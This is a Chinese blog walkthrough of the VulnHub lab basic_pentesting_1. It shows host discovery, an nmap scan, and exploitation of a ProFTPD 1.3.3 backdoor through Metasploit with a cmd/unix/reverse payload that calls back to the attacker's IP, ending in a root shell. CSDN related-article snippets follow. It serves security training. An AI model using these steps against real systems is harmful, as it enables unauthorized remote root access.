靶场练习第五天~vulnhub靶场之basic_pentesting_1

最新推荐文章于 2024-08-05 18:51:22 发布
最新推荐文章于 2024-08-05 18:51:22 发布
阅读量867 收藏 8
点赞数 1
分类专栏: # 靶机练习 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122694283
版权

一、信息收集

1.主机发现

靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv

(1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式

具体操作如下,查看一下kali的ip

然后使用命令sudo netdiscover,发现了靶机的ip

2.端口扫描,服务识别

(1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106

二、后渗透

1.根据服务版本搜索相关漏洞

这里用到msfconsole,关于msfconsole介绍:msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。

具体用法如下:

(1)在kali输入 msfconsole命令,进入到该框架内

(2)先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)

(3)由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;然后查看要设置的参数(show options),使用方法如下:

(4)设置一下RHOSTS(目标的地址),输入set RHOSTS 192.168.101.106

(5)设置payload,输入set payload cmd/unix/reverse(反向连接)

(6)查看backdoor需要的参数:show options,发现还需要设置一个监听的地址

(7)设置LHOST:set LHOST 192.168.101.10(kali的ip)

(8)参数设置完成后,输入run,执行攻击,成功进入getshell

(9)查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

汉南帝
关注
专栏目录
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 914
靶场提权
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
Vulnhubbasic_pentesting_1
zhangshuaiijie的博客
06-29 204
三个端口,ftp,ssh,http看来突破口不在网站上,那就看看是不是ftp,ssh和apache的问题,nmap扫描版本这个版本正确,而且msf上有。
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-05 344
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 754
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
Vulnhub靶机:basic_pentesting_1
qq_48904485的博客
02-29 547
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
[Vulnhub] basic_pentesting_1
weixin_46739058的博客
05-08 896
vulnhub靶场basic_pentesting 适合新手,难度较低
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 858
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
LinEnum.zip
08-24
LinEnum是一款在linux系统使用的辅助提权脚本,它能够帮助你找到系统的弱点,从而方便提权。
Pentesting
03-21
渗透测试
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1245
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
basic_pentesting1靶机
qq_68865419的博客
10-19 295
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
vulnhub系列:basic_pentesting_1
jq_j37的博客
08-04 197
vulnhub系列:basic_pentesting_1靶机,打靶文章
basic_pentesting_1靶场实战[超详细]
最新发布
weixin_68615160的博客
08-05 662
无可用信息,我们想起来之前扫描端口信息的时候,开启的ftp服务版本貌似有漏洞。ip地址为192.168.121.186,开启了21、22、80端口。攻击成功,成功拿到root权限,省了提权这一步。再次查看配置信息,发现还需要设置监听地址。设置RHOSTS为靶机ip地址。使用msfconsole查看。访问一下80web服务看看。使用第五个,1.3.3c。我们设置为kali的ip。提示没有添加任何内容。网卡模式设置为nat。
basic_pentesting_1靶机的信息收集技术和漏洞扫描技术学习运用
zyzy0512的博客
07-01 1697
打开kali输入ifconfig回车,如图1.1所示。
kali linux wifi监听模式,无线渗透教程1:监听无线网络
06-09
好的,我了解您的问题。针对您的问题,我需要说明的是我是一个语言模型,无法进行实际的操作和演示。但是我可以为您提供一些关于Kali Linux的WiFi监听模式和无线渗透方面的知识和资源。 Kali Linux是一款专门用于渗透测试和网络安全的Linux发行版。在Kali Linux中,可以使用一些工具来进行WiFi监听模式和无线渗透测试。其中,常用的工具包括airmon-ng、airodump-ng和aireplay-ng等。 具体的使用方法可以参考一些相关的教程和资源。以下是一些推荐的资源: 1. Kali Linux官方文档:https://docs.kali.org/ 2. Kali Linux渗透测试教程:https://www.kali.org/docs/pentesting/ 3. Kali Linux无线渗透教程:https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ 希望以上内容能对您有所帮助。如果您还有其他问题,可以继续提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值